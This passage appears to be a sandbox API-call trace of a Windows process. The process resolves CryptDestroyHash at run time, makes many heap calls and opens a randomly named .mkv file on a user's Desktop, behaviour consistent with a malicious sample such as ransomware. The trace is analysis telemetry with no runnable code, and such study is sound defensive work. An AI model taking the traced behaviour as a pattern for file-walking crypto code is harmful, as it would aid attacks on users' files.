RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71328 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712e8 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a80 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712e8 | out: hHeap=0x2af0000) returned 1 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647c8 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71398 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71378 [0085.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a80 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711e8 [0085.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7220 [0085.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7220, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a763b0 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0085.656] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyHash") returned 0x763af0e0 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a763b0 | out: hHeap=0x2af0000) returned 1 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.656] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.656] CryptDestroyHash (hHash=0x9a3d00) returned 1 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71388 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a80 [0085.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71288 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648d0 [0085.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a80 [0085.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71248 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649c0 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64888 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64870 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648a0 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71388 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1008 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a38 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64930 | out: hHeap=0x2af0000) returned 1 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71278 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648a0 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64870 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64930 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a50 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0085.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711e8 [0085.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0085.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71358 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71358 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64870 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64930 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648a0 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71278 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79060 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78f48 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79268 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a792b8 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79b00 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79830 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71308 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712b8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a028 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79e48 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78f20 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79178 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646a8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a762e8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76568 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a0f0 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730d8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79ad8 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64690 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76658 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71298 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76450 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0085.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0085.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0085.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64528 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64750 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0085.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0085.661] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/-yB2WD9ZHipl10.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\-yb2wd9zhipl10.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0085.813] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.813] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0085.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0085.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0085.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0085.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64600 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64690 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646a8 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646a8 | out: hHeap=0x2af0000) returned 1 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0085.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75858 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.814] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0085.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0085.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0085.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0085.815] 